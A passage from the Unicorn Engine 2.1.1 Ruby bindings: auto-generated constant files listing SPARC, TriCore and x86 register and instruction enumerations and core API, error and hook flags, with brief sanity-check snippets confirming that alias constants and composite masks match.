    UC_SPARC_REG_G1 = 54
    UC_SPARC_REG_G2 = 55
    UC_SPARC_REG_G3 = 56
    UC_SPARC_REG_G4 = 57
    UC_SPARC_REG_G5 = 58
    UC_SPARC_REG_G6 = 59
    UC_SPARC_REG_G7 = 60
    UC_SPARC_REG_I0 = 61
    UC_SPARC_REG_I1 = 62
    UC_SPARC_REG_I2 = 63
    UC_SPARC_REG_I3 = 64
    UC_SPARC_REG_I4 = 65
    UC_SPARC_REG_I5 = 66
    UC_SPARC_REG_FP = 67
    UC_SPARC_REG_I7 = 68
    UC_SPARC_REG_ICC = 69
    UC_SPARC_REG_L0 = 70
    UC_SPARC_REG_L1 = 71
    UC_SPARC_REG_L2 = 72
    UC_SPARC_REG_L3 = 73
    UC_SPARC_REG_L4 = 74
    UC_SPARC_REG_L5 = 75
    UC_SPARC_REG_L6 = 76
    UC_SPARC_REG_L7 = 77
    UC_SPARC_REG_O0 = 78
    UC_SPARC_REG_O1 = 79
    UC_SPARC_REG_O2 = 80
    UC_SPARC_REG_O3 = 81
    UC_SPARC_REG_O4 = 82
    UC_SPARC_REG_O5 = 83
    UC_SPARC_REG_SP = 84
    UC_SPARC_REG_O7 = 85
    UC_SPARC_REG_Y = 86
    UC_SPARC_REG_XCC = 87
    UC_SPARC_REG_PC = 88
    UC_SPARC_REG_ENDING = 89
    UC_SPARC_REG_O6 = 84
    UC_SPARC_REG_I6 = 67
end
unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/tricore_const.rb

# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [tricore_const.rb]

module UnicornEngine

# TRICORE CPU

    UC_CPU_TRICORE_TC1796 = 0
    UC_CPU_TRICORE_TC1797 = 1
    UC_CPU_TRICORE_TC27X = 2
    UC_CPU_TRICORE_ENDING = 3

# TRICORE registers

    UC_TRICORE_REG_INVALID = 0
    UC_TRICORE_REG_A0 = 1
    UC_TRICORE_REG_A1 = 2
    UC_TRICORE_REG_A2 = 3
    UC_TRICORE_REG_A3 = 4
    UC_TRICORE_REG_A4 = 5
    UC_TRICORE_REG_A5 = 6
    UC_TRICORE_REG_A6 = 7
    UC_TRICORE_REG_A7 = 8
    UC_TRICORE_REG_A8 = 9
    UC_TRICORE_REG_A9 = 10
    UC_TRICORE_REG_A10 = 11
    UC_TRICORE_REG_A11 = 12
    UC_TRICORE_REG_A12 = 13
    UC_TRICORE_REG_A13 = 14
    UC_TRICORE_REG_A14 = 15
    UC_TRICORE_REG_A15 = 16
    UC_TRICORE_REG_D0 = 17
    UC_TRICORE_REG_D1 = 18
    UC_TRICORE_REG_D2 = 19
    UC_TRICORE_REG_D3 = 20
    UC_TRICORE_REG_D4 = 21
    UC_TRICORE_REG_D5 = 22
    UC_TRICORE_REG_D6 = 23
    UC_TRICORE_REG_D7 = 24
    UC_TRICORE_REG_D8 = 25
    UC_TRICORE_REG_D9 = 26
    UC_TRICORE_REG_D10 = 27
    UC_TRICORE_REG_D11 = 28
    UC_TRICORE_REG_D12 = 29
    UC_TRICORE_REG_D13 = 30
    UC_TRICORE_REG_D14 = 31
    UC_TRICORE_REG_D15 = 32
    UC_TRICORE_REG_PCXI = 33
    UC_TRICORE_REG_PSW = 34
    UC_TRICORE_REG_PSW_USB_C = 35
    UC_TRICORE_REG_PSW_USB_V = 36
    UC_TRICORE_REG_PSW_USB_SV = 37
    UC_TRICORE_REG_PSW_USB_AV = 38
    UC_TRICORE_REG_PSW_USB_SAV = 39
    UC_TRICORE_REG_PC = 40
    UC_TRICORE_REG_SYSCON = 41
    UC_TRICORE_REG_CPU_ID = 42
    UC_TRICORE_REG_BIV = 43
    UC_TRICORE_REG_BTV = 44
    UC_TRICORE_REG_ISP = 45
    UC_TRICORE_REG_ICR = 46
    UC_TRICORE_REG_FCX = 47
    UC_TRICORE_REG_LCX = 48
    UC_TRICORE_REG_COMPAT = 49
    UC_TRICORE_REG_DPR0_U = 50
    UC_TRICORE_REG_DPR1_U = 51
    UC_TRICORE_REG_DPR2_U = 52
    UC_TRICORE_REG_DPR3_U = 53
    UC_TRICORE_REG_DPR0_L = 54
    UC_TRICORE_REG_DPR1_L = 55
    UC_TRICORE_REG_DPR2_L = 56
    UC_TRICORE_REG_DPR3_L = 57
    UC_TRICORE_REG_CPR0_U = 58
    UC_TRICORE_REG_CPR1_U = 59
    UC_TRICORE_REG_CPR2_U = 60
    UC_TRICORE_REG_CPR3_U = 61
    UC_TRICORE_REG_CPR0_L = 62
    UC_TRICORE_REG_CPR1_L = 63
    UC_TRICORE_REG_CPR2_L = 64
    UC_TRICORE_REG_CPR3_L = 65
    UC_TRICORE_REG_DPM0 = 66
    UC_TRICORE_REG_DPM1 = 67
    UC_TRICORE_REG_DPM2 = 68
    UC_TRICORE_REG_DPM3 = 69
    UC_TRICORE_REG_CPM0 = 70
    UC_TRICORE_REG_CPM1 = 71
    UC_TRICORE_REG_CPM2 = 72
    UC_TRICORE_REG_CPM3 = 73
    UC_TRICORE_REG_MMU_CON = 74
    UC_TRICORE_REG_MMU_ASI = 75
    UC_TRICORE_REG_MMU_TVA = 76
    UC_TRICORE_REG_MMU_TPA = 77
    UC_TRICORE_REG_MMU_TPX = 78
    UC_TRICORE_REG_MMU_TFA = 79
    UC_TRICORE_REG_BMACON = 80
    UC_TRICORE_REG_SMACON = 81
    UC_TRICORE_REG_DIEAR = 82
    UC_TRICORE_REG_DIETR = 83
    UC_TRICORE_REG_CCDIER = 84
    UC_TRICORE_REG_MIECON = 85
    UC_TRICORE_REG_PIEAR = 86
    UC_TRICORE_REG_PIETR = 87
    UC_TRICORE_REG_CCPIER = 88
    UC_TRICORE_REG_DBGSR = 89
    UC_TRICORE_REG_EXEVT = 90
    UC_TRICORE_REG_CREVT = 91
    UC_TRICORE_REG_SWEVT = 92
    UC_TRICORE_REG_TR0EVT = 93
    UC_TRICORE_REG_TR1EVT = 94
    UC_TRICORE_REG_DMS = 95
    UC_TRICORE_REG_DCX = 96
    UC_TRICORE_REG_DBGTCR = 97
    UC_TRICORE_REG_CCTRL = 98
    UC_TRICORE_REG_CCNT = 99
    UC_TRICORE_REG_ICNT = 100
    UC_TRICORE_REG_M1CNT = 101
    UC_TRICORE_REG_M2CNT = 102
    UC_TRICORE_REG_M3CNT = 103
    UC_TRICORE_REG_ENDING = 104
    UC_TRICORE_REG_GA0 = 1
    UC_TRICORE_REG_GA1 = 2
    UC_TRICORE_REG_GA8 = 9
    UC_TRICORE_REG_GA9 = 10
    UC_TRICORE_REG_SP = 11
    UC_TRICORE_REG_LR = 12
    UC_TRICORE_REG_IA = 16
    UC_TRICORE_REG_ID = 32
end
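A note on the alias constants that close several of these generated files: each alias is simply a second name bound to the same enum value as an architectural register, so either name can be passed to the engine's register accessors. A minimal check in plain Ruby, assuming only that the const files above are on the load path (no native extension is needed for this):

# Hypothetical sanity check: alias constants share the enum value of the
# register they name (values taken from the generated files above).
require 'unicorn_engine/tricore_const'
require 'unicorn_engine/sparc_const'
include UnicornEngine

puts UC_TRICORE_REG_SP == UC_TRICORE_REG_A10  # => true, both 11
puts UC_TRICORE_REG_LR == UC_TRICORE_REG_A11  # => true, both 12
puts UC_SPARC_REG_O6 == UC_SPARC_REG_SP       # => true, both 84
puts UC_SPARC_REG_I6 == UC_SPARC_REG_FP       # => true, both 67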
unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/unicorn_const.rb

# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [unicorn_const.rb]

module UnicornEngine
    UC_API_MAJOR = 2
    UC_API_MINOR = 1
    UC_API_PATCH = 0
    UC_API_EXTRA = 255
    UC_VERSION_MAJOR = 2
    UC_VERSION_MINOR = 1
    UC_VERSION_PATCH = 0
    UC_VERSION_EXTRA = 255
    UC_SECOND_SCALE = 1000000
    UC_MILISECOND_SCALE = 1000

    UC_ARCH_ARM = 1
    UC_ARCH_ARM64 = 2
    UC_ARCH_MIPS = 3
    UC_ARCH_X86 = 4
    UC_ARCH_PPC = 5
    UC_ARCH_SPARC = 6
    UC_ARCH_M68K = 7
    UC_ARCH_RISCV = 8
    UC_ARCH_S390X = 9
    UC_ARCH_TRICORE = 10
    UC_ARCH_MAX = 11

    UC_MODE_LITTLE_ENDIAN = 0
    UC_MODE_BIG_ENDIAN = 1073741824
    UC_MODE_ARM = 0
    UC_MODE_THUMB = 16
    UC_MODE_MCLASS = 32
    UC_MODE_V8 = 64
    UC_MODE_ARMBE8 = 1024
    UC_MODE_ARM926 = 128
    UC_MODE_ARM946 = 256
    UC_MODE_ARM1176 = 512
    UC_MODE_MICRO = 16
    UC_MODE_MIPS3 = 32
    UC_MODE_MIPS32R6 = 64
    UC_MODE_MIPS32 = 4
    UC_MODE_MIPS64 = 8
    UC_MODE_16 = 2
    UC_MODE_32 = 4
    UC_MODE_64 = 8
    UC_MODE_PPC32 = 4
    UC_MODE_PPC64 = 8
    UC_MODE_QPX = 16
    UC_MODE_SPARC32 = 4
    UC_MODE_SPARC64 = 8
    UC_MODE_V9 = 16
    UC_MODE_RISCV32 = 4
    UC_MODE_RISCV64 = 8

    UC_ERR_OK = 0
    UC_ERR_NOMEM = 1
    UC_ERR_ARCH = 2
    UC_ERR_HANDLE = 3
    UC_ERR_MODE = 4
    UC_ERR_VERSION = 5
    UC_ERR_READ_UNMAPPED = 6
    UC_ERR_WRITE_UNMAPPED = 7
    UC_ERR_FETCH_UNMAPPED = 8
    UC_ERR_HOOK = 9
    UC_ERR_INSN_INVALID = 10
    UC_ERR_MAP = 11
    UC_ERR_WRITE_PROT = 12
    UC_ERR_READ_PROT = 13
    UC_ERR_FETCH_PROT = 14
    UC_ERR_ARG = 15
    UC_ERR_READ_UNALIGNED = 16
    UC_ERR_WRITE_UNALIGNED = 17
    UC_ERR_FETCH_UNALIGNED = 18
    UC_ERR_HOOK_EXIST = 19
    UC_ERR_RESOURCE = 20
    UC_ERR_EXCEPTION = 21
    UC_ERR_OVERFLOW = 22

    UC_MEM_READ = 16
    UC_MEM_WRITE = 17
    UC_MEM_FETCH = 18
    UC_MEM_READ_UNMAPPED = 19
    UC_MEM_WRITE_UNMAPPED = 20
    UC_MEM_FETCH_UNMAPPED = 21
    UC_MEM_WRITE_PROT = 22
    UC_MEM_READ_PROT = 23
    UC_MEM_FETCH_PROT = 24
    UC_MEM_READ_AFTER = 25

    UC_TCG_OP_SUB = 0
    UC_TCG_OP_FLAG_CMP = 1
    UC_TCG_OP_FLAG_DIRECT = 2

    UC_HOOK_INTR = 1
    UC_HOOK_INSN = 2
    UC_HOOK_CODE = 4
    UC_HOOK_BLOCK = 8
    UC_HOOK_MEM_READ_UNMAPPED = 16
    UC_HOOK_MEM_WRITE_UNMAPPED = 32
    UC_HOOK_MEM_FETCH_UNMAPPED = 64
    UC_HOOK_MEM_READ_PROT = 128
    UC_HOOK_MEM_WRITE_PROT = 256
    UC_HOOK_MEM_FETCH_PROT = 512
    UC_HOOK_MEM_READ = 1024
    UC_HOOK_MEM_WRITE = 2048
    UC_HOOK_MEM_FETCH = 4096
    UC_HOOK_MEM_READ_AFTER = 8192
    UC_HOOK_INSN_INVALID = 16384
    UC_HOOK_EDGE_GENERATED = 32768
    UC_HOOK_TCG_OPCODE = 65536
    UC_HOOK_TLB_FILL = 131072
    UC_HOOK_MEM_UNMAPPED = 112
    UC_HOOK_MEM_PROT = 896
    UC_HOOK_MEM_READ_INVALID = 144
    UC_HOOK_MEM_WRITE_INVALID = 288
    UC_HOOK_MEM_FETCH_INVALID = 576
    UC_HOOK_MEM_INVALID = 1008
    UC_HOOK_MEM_VALID = 7168

    UC_QUERY_MODE = 1
    UC_QUERY_PAGE_SIZE = 2
    UC_QUERY_ARCH = 3
    UC_QUERY_TIMEOUT = 4

    UC_CTL_IO_NONE = 0
    UC_CTL_IO_WRITE = 1
    UC_CTL_IO_READ = 2
    UC_CTL_IO_READ_WRITE = 3

    UC_TLB_CPU = 0
    UC_TLB_VIRTUAL = 1

    UC_CTL_UC_MODE = 0
    UC_CTL_UC_PAGE_SIZE = 1
    UC_CTL_UC_ARCH = 2
    UC_CTL_UC_TIMEOUT = 3
    UC_CTL_UC_USE_EXITS = 4
    UC_CTL_UC_EXITS_CNT = 5
    UC_CTL_UC_EXITS = 6
    UC_CTL_CPU_MODEL = 7
    UC_CTL_TB_REQUEST_CACHE = 8
    UC_CTL_TB_REMOVE_CACHE = 9
    UC_CTL_TB_FLUSH = 10
    UC_CTL_TLB_FLUSH = 11
    UC_CTL_TLB_TYPE = 12
    UC_CTL_TCG_BUFFER_SIZE = 13
    UC_CTL_CONTEXT_MODE = 14

    UC_PROT_NONE = 0
    UC_PROT_READ = 1
    UC_PROT_WRITE = 2
    UC_PROT_EXEC = 4
    UC_PROT_ALL = 7

    UC_CTL_CONTEXT_CPU = 1
    UC_CTL_CONTEXT_MEMORY = 2
end
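The composite masks above (UC_HOOK_MEM_UNMAPPED, UC_HOOK_MEM_PROT, UC_HOOK_MEM_INVALID, UC_HOOK_MEM_VALID, UC_PROT_ALL) are plain bitwise ORs of the individual flags, which is why their decimal values look arbitrary at first glance. A short sketch verifying the arithmetic in plain Ruby, using only this const file:

require 'unicorn_engine/unicorn_const'
include UnicornEngine

# 16 | 32 | 64 == 112
puts (UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED |
      UC_HOOK_MEM_FETCH_UNMAPPED) == UC_HOOK_MEM_UNMAPPED
# 128 | 256 | 512 == 896
puts (UC_HOOK_MEM_READ_PROT | UC_HOOK_MEM_WRITE_PROT |
      UC_HOOK_MEM_FETCH_PROT) == UC_HOOK_MEM_PROT
# 1 | 2 | 4 == 7
puts (UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC) == UC_PROT_ALL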
unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/version.rb

module Unicorn
  VERSION = "2.1.1"
end

unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/x86_const.rb

# For Unicorn Engine.
AUTO-GENERATED FILE, DO NOT EDIT [x86_const.rb] module UnicornEngine # X86 CPU UC_CPU_X86_QEMU64 = 0 UC_CPU_X86_PHENOM = 1 UC_CPU_X86_CORE2DUO = 2 UC_CPU_X86_KVM64 = 3 UC_CPU_X86_QEMU32 = 4 UC_CPU_X86_KVM32 = 5 UC_CPU_X86_COREDUO = 6 UC_CPU_X86_486 = 7 UC_CPU_X86_PENTIUM = 8 UC_CPU_X86_PENTIUM2 = 9 UC_CPU_X86_PENTIUM3 = 10 UC_CPU_X86_ATHLON = 11 UC_CPU_X86_N270 = 12 UC_CPU_X86_CONROE = 13 UC_CPU_X86_PENRYN = 14 UC_CPU_X86_NEHALEM = 15 UC_CPU_X86_WESTMERE = 16 UC_CPU_X86_SANDYBRIDGE = 17 UC_CPU_X86_IVYBRIDGE = 18 UC_CPU_X86_HASWELL = 19 UC_CPU_X86_BROADWELL = 20 UC_CPU_X86_SKYLAKE_CLIENT = 21 UC_CPU_X86_SKYLAKE_SERVER = 22 UC_CPU_X86_CASCADELAKE_SERVER = 23 UC_CPU_X86_COOPERLAKE = 24 UC_CPU_X86_ICELAKE_CLIENT = 25 UC_CPU_X86_ICELAKE_SERVER = 26 UC_CPU_X86_DENVERTON = 27 UC_CPU_X86_SNOWRIDGE = 28 UC_CPU_X86_KNIGHTSMILL = 29 UC_CPU_X86_OPTERON_G1 = 30 UC_CPU_X86_OPTERON_G2 = 31 UC_CPU_X86_OPTERON_G3 = 32 UC_CPU_X86_OPTERON_G4 = 33 UC_CPU_X86_OPTERON_G5 = 34 UC_CPU_X86_EPYC = 35 UC_CPU_X86_DHYANA = 36 UC_CPU_X86_EPYC_ROME = 37 UC_CPU_X86_ENDING = 38 # X86 registers UC_X86_REG_INVALID = 0 UC_X86_REG_AH = 1 UC_X86_REG_AL = 2 UC_X86_REG_AX = 3 UC_X86_REG_BH = 4 UC_X86_REG_BL = 5 UC_X86_REG_BP = 6 UC_X86_REG_BPL = 7 UC_X86_REG_BX = 8 UC_X86_REG_CH = 9 UC_X86_REG_CL = 10 UC_X86_REG_CS = 11 UC_X86_REG_CX = 12 UC_X86_REG_DH = 13 UC_X86_REG_DI = 14 UC_X86_REG_DIL = 15 UC_X86_REG_DL = 16 UC_X86_REG_DS = 17 UC_X86_REG_DX = 18 UC_X86_REG_EAX = 19 UC_X86_REG_EBP = 20 UC_X86_REG_EBX = 21 UC_X86_REG_ECX = 22 UC_X86_REG_EDI = 23 UC_X86_REG_EDX = 24 UC_X86_REG_EFLAGS = 25 UC_X86_REG_EIP = 26 UC_X86_REG_ES = 28 UC_X86_REG_ESI = 29 UC_X86_REG_ESP = 30 UC_X86_REG_FPSW = 31 UC_X86_REG_FS = 32 UC_X86_REG_GS = 33 UC_X86_REG_IP = 34 UC_X86_REG_RAX = 35 UC_X86_REG_RBP = 36 UC_X86_REG_RBX = 37 UC_X86_REG_RCX = 38 UC_X86_REG_RDI = 39 UC_X86_REG_RDX = 40 UC_X86_REG_RIP = 41 UC_X86_REG_RSI = 43 UC_X86_REG_RSP = 44 UC_X86_REG_SI = 45 UC_X86_REG_SIL = 46 UC_X86_REG_SP = 47 UC_X86_REG_SPL = 48 UC_X86_REG_SS = 49 UC_X86_REG_CR0 = 50 UC_X86_REG_CR1 = 51 UC_X86_REG_CR2 = 52 UC_X86_REG_CR3 = 53 UC_X86_REG_CR4 = 54 UC_X86_REG_CR8 = 58 UC_X86_REG_DR0 = 66 UC_X86_REG_DR1 = 67 UC_X86_REG_DR2 = 68 UC_X86_REG_DR3 = 69 UC_X86_REG_DR4 = 70 UC_X86_REG_DR5 = 71 UC_X86_REG_DR6 = 72 UC_X86_REG_DR7 = 73 UC_X86_REG_FP0 = 82 UC_X86_REG_FP1 = 83 UC_X86_REG_FP2 = 84 UC_X86_REG_FP3 = 85 UC_X86_REG_FP4 = 86 UC_X86_REG_FP5 = 87 UC_X86_REG_FP6 = 88 UC_X86_REG_FP7 = 89 UC_X86_REG_K0 = 90 UC_X86_REG_K1 = 91 UC_X86_REG_K2 = 92 UC_X86_REG_K3 = 93 UC_X86_REG_K4 = 94 UC_X86_REG_K5 = 95 UC_X86_REG_K6 = 96 UC_X86_REG_K7 = 97 UC_X86_REG_MM0 = 98 UC_X86_REG_MM1 = 99 UC_X86_REG_MM2 = 100 UC_X86_REG_MM3 = 101 UC_X86_REG_MM4 = 102 UC_X86_REG_MM5 = 103 UC_X86_REG_MM6 = 104 UC_X86_REG_MM7 = 105 UC_X86_REG_R8 = 106 UC_X86_REG_R9 = 107 UC_X86_REG_R10 = 108 UC_X86_REG_R11 = 109 UC_X86_REG_R12 = 110 UC_X86_REG_R13 = 111 UC_X86_REG_R14 = 112 UC_X86_REG_R15 = 113 UC_X86_REG_ST0 = 114 UC_X86_REG_ST1 = 115 UC_X86_REG_ST2 = 116 UC_X86_REG_ST3 = 117 UC_X86_REG_ST4 = 118 UC_X86_REG_ST5 = 119 UC_X86_REG_ST6 = 120 UC_X86_REG_ST7 = 121 UC_X86_REG_XMM0 = 122 UC_X86_REG_XMM1 = 123 UC_X86_REG_XMM2 = 124 UC_X86_REG_XMM3 = 125 UC_X86_REG_XMM4 = 126 UC_X86_REG_XMM5 = 127 UC_X86_REG_XMM6 = 128 UC_X86_REG_XMM7 = 129 UC_X86_REG_XMM8 = 130 UC_X86_REG_XMM9 = 131 UC_X86_REG_XMM10 = 132 UC_X86_REG_XMM11 = 133 UC_X86_REG_XMM12 = 134 UC_X86_REG_XMM13 = 135 UC_X86_REG_XMM14 = 136 UC_X86_REG_XMM15 = 137 UC_X86_REG_XMM16 = 138 UC_X86_REG_XMM17 = 139 UC_X86_REG_XMM18 = 140 UC_X86_REG_XMM19 = 141 
UC_X86_REG_XMM20 = 142 UC_X86_REG_XMM21 = 143 UC_X86_REG_XMM22 = 144 UC_X86_REG_XMM23 = 145 UC_X86_REG_XMM24 = 146 UC_X86_REG_XMM25 = 147 UC_X86_REG_XMM26 = 148 UC_X86_REG_XMM27 = 149 UC_X86_REG_XMM28 = 150 UC_X86_REG_XMM29 = 151 UC_X86_REG_XMM30 = 152 UC_X86_REG_XMM31 = 153 UC_X86_REG_YMM0 = 154 UC_X86_REG_YMM1 = 155 UC_X86_REG_YMM2 = 156 UC_X86_REG_YMM3 = 157 UC_X86_REG_YMM4 = 158 UC_X86_REG_YMM5 = 159 UC_X86_REG_YMM6 = 160 UC_X86_REG_YMM7 = 161 UC_X86_REG_YMM8 = 162 UC_X86_REG_YMM9 = 163 UC_X86_REG_YMM10 = 164 UC_X86_REG_YMM11 = 165 UC_X86_REG_YMM12 = 166 UC_X86_REG_YMM13 = 167 UC_X86_REG_YMM14 = 168 UC_X86_REG_YMM15 = 169 UC_X86_REG_YMM16 = 170 UC_X86_REG_YMM17 = 171 UC_X86_REG_YMM18 = 172 UC_X86_REG_YMM19 = 173 UC_X86_REG_YMM20 = 174 UC_X86_REG_YMM21 = 175 UC_X86_REG_YMM22 = 176 UC_X86_REG_YMM23 = 177 UC_X86_REG_YMM24 = 178 UC_X86_REG_YMM25 = 179 UC_X86_REG_YMM26 = 180 UC_X86_REG_YMM27 = 181 UC_X86_REG_YMM28 = 182 UC_X86_REG_YMM29 = 183 UC_X86_REG_YMM30 = 184 UC_X86_REG_YMM31 = 185 UC_X86_REG_ZMM0 = 186 UC_X86_REG_ZMM1 = 187 UC_X86_REG_ZMM2 = 188 UC_X86_REG_ZMM3 = 189 UC_X86_REG_ZMM4 = 190 UC_X86_REG_ZMM5 = 191 UC_X86_REG_ZMM6 = 192 UC_X86_REG_ZMM7 = 193 UC_X86_REG_ZMM8 = 194 UC_X86_REG_ZMM9 = 195 UC_X86_REG_ZMM10 = 196 UC_X86_REG_ZMM11 = 197 UC_X86_REG_ZMM12 = 198 UC_X86_REG_ZMM13 = 199 UC_X86_REG_ZMM14 = 200 UC_X86_REG_ZMM15 = 201 UC_X86_REG_ZMM16 = 202 UC_X86_REG_ZMM17 = 203 UC_X86_REG_ZMM18 = 204 UC_X86_REG_ZMM19 = 205 UC_X86_REG_ZMM20 = 206 UC_X86_REG_ZMM21 = 207 UC_X86_REG_ZMM22 = 208 UC_X86_REG_ZMM23 = 209 UC_X86_REG_ZMM24 = 210 UC_X86_REG_ZMM25 = 211 UC_X86_REG_ZMM26 = 212 UC_X86_REG_ZMM27 = 213 UC_X86_REG_ZMM28 = 214 UC_X86_REG_ZMM29 = 215 UC_X86_REG_ZMM30 = 216 UC_X86_REG_ZMM31 = 217 UC_X86_REG_R8B = 218 UC_X86_REG_R9B = 219 UC_X86_REG_R10B = 220 UC_X86_REG_R11B = 221 UC_X86_REG_R12B = 222 UC_X86_REG_R13B = 223 UC_X86_REG_R14B = 224 UC_X86_REG_R15B = 225 UC_X86_REG_R8D = 226 UC_X86_REG_R9D = 227 UC_X86_REG_R10D = 228 UC_X86_REG_R11D = 229 UC_X86_REG_R12D = 230 UC_X86_REG_R13D = 231 UC_X86_REG_R14D = 232 UC_X86_REG_R15D = 233 UC_X86_REG_R8W = 234 UC_X86_REG_R9W = 235 UC_X86_REG_R10W = 236 UC_X86_REG_R11W = 237 UC_X86_REG_R12W = 238 UC_X86_REG_R13W = 239 UC_X86_REG_R14W = 240 UC_X86_REG_R15W = 241 UC_X86_REG_IDTR = 242 UC_X86_REG_GDTR = 243 UC_X86_REG_LDTR = 244 UC_X86_REG_TR = 245 UC_X86_REG_FPCW = 246 UC_X86_REG_FPTAG = 247 UC_X86_REG_MSR = 248 UC_X86_REG_MXCSR = 249 UC_X86_REG_FS_BASE = 250 UC_X86_REG_GS_BASE = 251 UC_X86_REG_FLAGS = 252 UC_X86_REG_RFLAGS = 253 UC_X86_REG_FIP = 254 UC_X86_REG_FCS = 255 UC_X86_REG_FDP = 256 UC_X86_REG_FDS = 257 UC_X86_REG_FOP = 258 UC_X86_REG_ENDING = 259 # X86 instructions UC_X86_INS_INVALID = 0 UC_X86_INS_AAA = 1 UC_X86_INS_AAD = 2 UC_X86_INS_AAM = 3 UC_X86_INS_AAS = 4 UC_X86_INS_FABS = 5 UC_X86_INS_ADC = 6 UC_X86_INS_ADCX = 7 UC_X86_INS_ADD = 8 UC_X86_INS_ADDPD = 9 UC_X86_INS_ADDPS = 10 UC_X86_INS_ADDSD = 11 UC_X86_INS_ADDSS = 12 UC_X86_INS_ADDSUBPD = 13 UC_X86_INS_ADDSUBPS = 14 UC_X86_INS_FADD = 15 UC_X86_INS_FIADD = 16 UC_X86_INS_FADDP = 17 UC_X86_INS_ADOX = 18 UC_X86_INS_AESDECLAST = 19 UC_X86_INS_AESDEC = 20 UC_X86_INS_AESENCLAST = 21 UC_X86_INS_AESENC = 22 UC_X86_INS_AESIMC = 23 UC_X86_INS_AESKEYGENASSIST = 24 UC_X86_INS_AND = 25 UC_X86_INS_ANDN = 26 UC_X86_INS_ANDNPD = 27 UC_X86_INS_ANDNPS = 28 UC_X86_INS_ANDPD = 29 UC_X86_INS_ANDPS = 30 UC_X86_INS_ARPL = 31 UC_X86_INS_BEXTR = 32 UC_X86_INS_BLCFILL = 33 UC_X86_INS_BLCI = 34 UC_X86_INS_BLCIC = 35 UC_X86_INS_BLCMSK = 36 UC_X86_INS_BLCS = 37 UC_X86_INS_BLENDPD = 38 UC_X86_INS_BLENDPS = 
39 UC_X86_INS_BLENDVPD = 40 UC_X86_INS_BLENDVPS = 41 UC_X86_INS_BLSFILL = 42 UC_X86_INS_BLSI = 43 UC_X86_INS_BLSIC = 44 UC_X86_INS_BLSMSK = 45 UC_X86_INS_BLSR = 46 UC_X86_INS_BOUND = 47 UC_X86_INS_BSF = 48 UC_X86_INS_BSR = 49 UC_X86_INS_BSWAP = 50 UC_X86_INS_BT = 51 UC_X86_INS_BTC = 52 UC_X86_INS_BTR = 53 UC_X86_INS_BTS = 54 UC_X86_INS_BZHI = 55 UC_X86_INS_CALL = 56 UC_X86_INS_CBW = 57 UC_X86_INS_CDQ = 58 UC_X86_INS_CDQE = 59 UC_X86_INS_FCHS = 60 UC_X86_INS_CLAC = 61 UC_X86_INS_CLC = 62 UC_X86_INS_CLD = 63 UC_X86_INS_CLFLUSH = 64 UC_X86_INS_CLFLUSHOPT = 65 UC_X86_INS_CLGI = 66 UC_X86_INS_CLI = 67 UC_X86_INS_CLTS = 68 UC_X86_INS_CLWB = 69 UC_X86_INS_CMC = 70 UC_X86_INS_CMOVA = 71 UC_X86_INS_CMOVAE = 72 UC_X86_INS_CMOVB = 73 UC_X86_INS_CMOVBE = 74 UC_X86_INS_FCMOVBE = 75 UC_X86_INS_FCMOVB = 76 UC_X86_INS_CMOVE = 77 UC_X86_INS_FCMOVE = 78 UC_X86_INS_CMOVG = 79 UC_X86_INS_CMOVGE = 80 UC_X86_INS_CMOVL = 81 UC_X86_INS_CMOVLE = 82 UC_X86_INS_FCMOVNBE = 83 UC_X86_INS_FCMOVNB = 84 UC_X86_INS_CMOVNE = 85 UC_X86_INS_FCMOVNE = 86 UC_X86_INS_CMOVNO = 87 UC_X86_INS_CMOVNP = 88 UC_X86_INS_FCMOVNU = 89 UC_X86_INS_CMOVNS = 90 UC_X86_INS_CMOVO = 91 UC_X86_INS_CMOVP = 92 UC_X86_INS_FCMOVU = 93 UC_X86_INS_CMOVS = 94 UC_X86_INS_CMP = 95 UC_X86_INS_CMPPD = 96 UC_X86_INS_CMPPS = 97 UC_X86_INS_CMPSB = 98 UC_X86_INS_CMPSD = 99 UC_X86_INS_CMPSQ = 100 UC_X86_INS_CMPSS = 101 UC_X86_INS_CMPSW = 102 UC_X86_INS_CMPXCHG16B = 103 UC_X86_INS_CMPXCHG = 104 UC_X86_INS_CMPXCHG8B = 105 UC_X86_INS_COMISD = 106 UC_X86_INS_COMISS = 107 UC_X86_INS_FCOMP = 108 UC_X86_INS_FCOMPI = 109 UC_X86_INS_FCOMI = 110 UC_X86_INS_FCOM = 111 UC_X86_INS_FCOS = 112 UC_X86_INS_CPUID = 113 UC_X86_INS_CQO = 114 UC_X86_INS_CRC32 = 115 UC_X86_INS_CVTDQ2PD = 116 UC_X86_INS_CVTDQ2PS = 117 UC_X86_INS_CVTPD2DQ = 118 UC_X86_INS_CVTPD2PS = 119 UC_X86_INS_CVTPS2DQ = 120 UC_X86_INS_CVTPS2PD = 121 UC_X86_INS_CVTSD2SI = 122 UC_X86_INS_CVTSD2SS = 123 UC_X86_INS_CVTSI2SD = 124 UC_X86_INS_CVTSI2SS = 125 UC_X86_INS_CVTSS2SD = 126 UC_X86_INS_CVTSS2SI = 127 UC_X86_INS_CVTTPD2DQ = 128 UC_X86_INS_CVTTPS2DQ = 129 UC_X86_INS_CVTTSD2SI = 130 UC_X86_INS_CVTTSS2SI = 131 UC_X86_INS_CWD = 132 UC_X86_INS_CWDE = 133 UC_X86_INS_DAA = 134 UC_X86_INS_DAS = 135 UC_X86_INS_DATA16 = 136 UC_X86_INS_DEC = 137 UC_X86_INS_DIV = 138 UC_X86_INS_DIVPD = 139 UC_X86_INS_DIVPS = 140 UC_X86_INS_FDIVR = 141 UC_X86_INS_FIDIVR = 142 UC_X86_INS_FDIVRP = 143 UC_X86_INS_DIVSD = 144 UC_X86_INS_DIVSS = 145 UC_X86_INS_FDIV = 146 UC_X86_INS_FIDIV = 147 UC_X86_INS_FDIVP = 148 UC_X86_INS_DPPD = 149 UC_X86_INS_DPPS = 150 UC_X86_INS_RET = 151 UC_X86_INS_ENCLS = 152 UC_X86_INS_ENCLU = 153 UC_X86_INS_ENTER = 154 UC_X86_INS_EXTRACTPS = 155 UC_X86_INS_EXTRQ = 156 UC_X86_INS_F2XM1 = 157 UC_X86_INS_LCALL = 158 UC_X86_INS_LJMP = 159 